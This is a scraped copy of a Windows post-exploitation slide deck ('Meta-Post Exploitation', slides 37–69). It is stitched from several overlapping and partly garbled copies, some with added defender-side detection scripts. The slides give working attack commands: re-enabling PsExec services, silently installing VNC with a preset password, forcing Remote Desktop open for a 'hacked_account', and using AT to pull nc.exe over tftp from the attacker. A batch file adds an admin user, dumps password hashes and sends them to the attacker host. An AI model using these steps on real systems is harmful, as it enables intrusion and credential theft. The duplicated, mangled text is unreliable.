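}
Find-UnauditedPaths -MustAudit @($Path)
```

The sweep is the useful half for a defender: object-access auditing is usually configured once and never re-checked, so a SACL stripped during an intrusion stays stripped until someone compares the live SACLs against the list of objects that are supposed to carry audit entries.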

Slide 38

• DEMOS
– Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else

– Use the credentials / access of another user

• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
– Target users

• Who has access to what
• Where is the data

– Change identity
• Hijack credentials / sessions
• Abuse tokens

– Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
– Incognito (Metasploit)

• Enumerate / hijack tokens

– FU / FUTo

• Enable SYSTEM privileges
• Change process privileges (DKOM)

– SU / SUDO / KSU
– Process injection
– Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
– Privileges or SIDs

• What we get
– Access, Access, Access

• How we get it
– Incognito vs FUTo

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly

• Not just through existing tools
– Stealth / Persistence requirements

• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
– PsExec: It's still cool (Thanks Mark)

• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)

• Turning off or adding exceptions to security software
– Firewalls, AV, logging

• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
– PsExec was a great, awesome remote shell/command tool
– Everybody now disables ClipBook, which psexec requires (l4m3)
– Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe

– net use \\target\ipc$ password /user:username
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv

Slide 51

Feature Modification
• Enabling VNC (from the command line)

– Go get VNC (check out guh.nu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:

• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll

– regedit /s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"

vnc.reg file contents:

Windows Registry Editor Version 5.00
; header line above is required by regedit /s; it was not shown on the slide

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app

• Ex: System controlling access to security doors
– No command-line way of modifying the system; need a GUI

• SCADA systems
• Security cameras
• Who knows what you might be up to

– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO

Page 37: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 38: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

Page 39

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs. FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors?
  – These can be modified programmatically and directly
• Not just through existing tools
  – Stealth / persistence requirements
• May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: it's still cool (thanks, Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying local security policies

Slide 49

Feature Modification

• Enabling PsExec
  – PsExec was a great, awesome remote shell / command tool
  – Everybody now disables ClipBook, which PsExec requires (l4m3)
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling PsExec
• Use the system control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
      – No command-line way of modifying the system; need the GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
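As an added defender-side example (not the presenters' tooling), the Python below audits a secedit template and a .reg export for exactly the changes the two files above make: cleared deny-logon rights, logon rights granted to an unexpected account, and the Terminal Server values flipped. The sample file contents are constructed from the slides; "hacked_account" is the slides' own placeholder.

```python
"""Audit a secedit template and a .reg export for the Remote Desktop
re-enablement pattern described on slides 53 and 54.

Added example, not the presenters' tooling.  The two sample files are
constructed from the slide contents; 'hacked_account' is the slides' own
placeholder name, and the key/value names are the real Windows ones."""
import configparser
import re

# Constructed copy of fix_ts_policy.ini from slide 53.
FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

# Constructed copy of enable_ts.reg from slide 54.
ENABLE_TS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Deny rights: an empty assignment removes a protection that GPO may have set.
DENY_RIGHTS = (
    "sedenyinteractivelogonright",
    "sedenynetworklogonright",
    "sedenyremoteinteractivelogonright",
)
# Grant rights: any account listed here gains console or RDP logon.
GRANT_RIGHTS = ("seinteractivelogonright", "seremoteinteractivelogonright")

REG_DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')


def parse_privilege_rights(ini_text):
    """Return {right_name: [accounts]} from the [Privilege Rights] section.
    secedit lists accounts comma-separated; an empty value clears the right."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(ini_text)
    rights = {}
    if cp.has_section("Privilege Rights"):
        for right, value in cp.items("Privilege Rights"):
            rights[right.lower()] = [a.strip() for a in value.split(",") if a.strip()]
    return rights


def parse_reg_dwords(reg_text):
    """Return {key_path: {value_name: int}} for the dword values of a .reg file."""
    keys, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = REG_DWORD_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = int(m.group("hex"), 16)
    return keys


def audit_rdp_enablement(ini_text, reg_text, expected_rdp_accounts=()):
    """Return findings explaining how the two files open up Remote Desktop.
    An empty list means neither file weakens the logon policy or TS settings."""
    findings = []
    rights = parse_privilege_rights(ini_text)
    for right in DENY_RIGHTS:
        if right in rights and not rights[right]:
            findings.append(f"{right} cleared: deny-logon protection removed")
    for right in GRANT_RIGHTS:
        for account in rights.get(right, []):
            if account not in expected_rdp_accounts:
                findings.append(f"{right} granted to unexpected account {account}")
    ts = parse_reg_dwords(reg_text).get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: incoming RDP connections allowed")
    if ts.get("TSEnabled") == 1:
        findings.append("TSEnabled=1: Terminal Services switched on")
    return findings


if __name__ == "__main__":
    for finding in audit_rdp_enablement(FIX_TS_POLICY_INI, ENABLE_TS_REG):
        print(finding)
```

Run against an exported security template (secedit /export) and a registry export of the Terminal Server key, the same checks flag the change on a live host.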

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Old-school techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i us GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
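As an added example from the detection side (not the presenters' AtAbuse tool), the Python below correlates Security-log events into the chain on slides 60 and 61: a network logon, a scheduled task created, a new local user and an addition to a local group, all on one host within a short window. The log lines are constructed in a simplified pipe-separated format, not a real event-log export; the event IDs are the real Security-log ones.

```python
"""Correlate Windows Security events into the AT-driven chain from slides
60 and 61: SMB session (network logon), scheduled job created, new local
user, user added to a local group, all on one host within a short window.

Added example, not the presenters' tooling.  The log lines are constructed
in a simplified 'time|host|event_id|key=value ...' format, not a real
event-log export; the event IDs are the real Security-log ones."""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON = 4624        # An account was successfully logged on (type 3 = net use)
TASK_CREATED = 4698         # A scheduled task was created
USER_CREATED = 4720         # A user account was created
GROUP_MEMBER_ADDED = 4732   # A member was added to a security-enabled local group

# The order the chain is expected in; each stage must follow the previous one.
CHAIN = (NETWORK_LOGON, TASK_CREATED, USER_CREATED, GROUP_MEMBER_ADDED)

# Constructed sample: WS01 shows the whole chain within three minutes (the
# account changes carry subject=SYSTEM, since slide 59 notes AT jobs default
# to running as SYSTEM); WS02 only has a routine task and must not be flagged.
SAMPLE_LOG = """\
2008-03-01 12:00:05|WS01|4624|logon_type=3 user=jdoe
2008-03-01 12:00:40|WS01|4698|task=At1 command=tftp
2008-03-01 12:01:50|WS01|4698|task=At2 command=e.bat
2008-03-01 12:02:10|WS01|4720|user=hacked subject=SYSTEM
2008-03-01 12:02:11|WS01|4732|group=Administrators member=hacked subject=SYSTEM
2008-03-01 13:15:00|WS02|4698|task=NightlyCleanup command=cleanup.cmd
2008-03-01 13:20:00|WS02|4624|logon_type=3 user=jdoe
"""


def parse_line(line):
    """Turn one 'time|host|event_id|k=v k=v' line into a dict."""
    ts, host, event_id, detail = line.split("|", 3)
    fields = dict(kv.split("=", 1) for kv in detail.split())
    return {"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "host": host, "event_id": int(event_id), **fields}


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def find_at_abuse_chains(events, window_minutes=10):
    """Return {host: [matched events]} for every host on which a type-3 logon
    is followed, in order and within the window, by the rest of CHAIN."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host[ev["host"]].append(ev)

    hits = {}
    for host, evs in by_host.items():
        for i, start in enumerate(evs):
            if start["event_id"] != NETWORK_LOGON or start.get("logon_type") != "3":
                continue
            matched, stage = [start], 1
            for ev in evs[i + 1:]:
                if ev["time"] - start["time"] > window:
                    break          # chain did not complete inside the window
                if ev["event_id"] == CHAIN[stage]:
                    matched.append(ev)
                    stage += 1
                    if stage == len(CHAIN):
                        hits[host] = matched
                        break
            if host in hits:
                break              # one complete chain per host is enough
    return hits


if __name__ == "__main__":
    for host, chain in find_at_abuse_chains(parse_log(SAMPLE_LOG)).items():
        steps = " -> ".join(str(e["event_id"]) for e in chain)
        print(f"{host}: {steps} (new group member {chain[-1]['member']})")
```

The same ordering check works on a real export once the fields are mapped onto this shape; tightening the window trades recall for fewer false positives from routine task creation.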

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

